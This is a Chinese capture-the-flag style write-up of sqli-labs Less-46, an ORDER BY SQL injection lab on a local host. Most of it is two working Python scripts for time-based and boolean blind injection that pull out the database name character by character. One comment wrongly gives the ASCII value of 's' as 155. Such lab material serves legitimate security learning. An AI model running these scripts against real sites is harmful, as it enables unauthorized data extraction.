sqlilabs 46关(布尔、时间盲注)
46关有变化了,需要我们输入sort,那我们就从sort=1开始 递增测试:
发现测试到sort=4就出现报错:
我们查看源码:
从图中可看出:用户输入的sort值被用于查询时的排序方式
那从前面测试sort=4时出现报错可以知道,当前的数据库有三列
时间盲注:
注意:因为时间盲注效率很低,所以建议用python写个脚本来做
import requests
import time
def send_request(url, payload):
# 确认是否猜对
full_url = f"{url}{payload}"
start_time = time.time()
response = requests.get(full_url)
end_time = time.time()
return end_time - start_time >= 0.5
def get_database_length(url, delay=0.7):
for length in range(1, 20):
payload = f"?sort=1 and if(length(database())={length}, sleep({delay}), 0)--+"
if send_request(url, payload):
return length
return 0
def get_database_name(url, length, delay=0.7):
db_name = ''
for position in range(1, length + 1):
for ascii_value in range(32, 127):
payload = f"?sort=1 and if((select ascii(substr(database(), {position}, 1)))={ascii_value}, sleep({delay}), 0)--+"
if send_request(url, payload):
db_name += chr(ascii_value)
break
print(db_name)
return db_name
def main():
url = "http://127.0.0.1/sqlilabs/Less-46/"
delay = 0.7
db_length = get_database_length(url, delay)
if db_length == 0:
print("Failed to determine database length.")
return
else:
print(f"the length of database:{db_length}")
db_name = get_database_name(url, db_length, delay)
print(f"The database name is: {db_name}")
if __name__ == "__main__":
main()
盲注也是慢的没边,不过也算是能做出来
这里只展示获取数据库的过程了,只需修改代码就可以获取其他信息了
布尔盲注:
感谢伟大的AI !!!
原理:
在上文源码中已知:用户在sort中输入的值,将影响输出列表的排序
即:
以id排序:
以username排序:
两次返回的第一行数据不一致,那我们就可以根据这个特点进行布尔盲注了:
http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr(database(),1,1))=115,id,username)%20--
# 当数据库的第一个字母为s(ascii值为155),则以id排序,否则以username排序
由此引申的python代码如下:
import requests
from bs4 import BeautifulSoup
def get_content(resp):
# 提出其中的信息(如果猜对,就是Dumb)
soup = BeautifulSoup(resp.text, 'html.parser')
username_elem = soup.select_one('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
return username_elem.text.strip() if username_elem else None
def binary_search_injection(base_url, sql_query_template, max_length=100):
result = []
for i in range(1, max_length + 1):
left, right = 32, 126
while left <= right:
mid = (left + right) // 2
url = base_url.format(sql_query=sql_query_template.format(index=i, mid_char=mid))
try:
resp = requests.get(url)
content = get_content(resp)
if content == 'Dumb':
left = mid + 1
else:
right = mid - 1
except Exception as e:
print(f"请求 {url} 失败: {e}")
break
if left > 127 or left < 32:
break
char_to_add = chr(left)
if char_to_add.isspace():
break
result.append(char_to_add)
print(''.join(result))
return ''.join(result)
if __name__ == '__main__':
base_url = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort={sql_query}"
database_query = "if(ascii(substr(database(),{index},1))>{mid_char},id,username)"
# 获取数据库名称
db_name = binary_search_injection(base_url, database_query)
print(f"The database name is: {db_name}")
这里只展示获取数据库的过程了,只需修改代码就可以获取其他信息了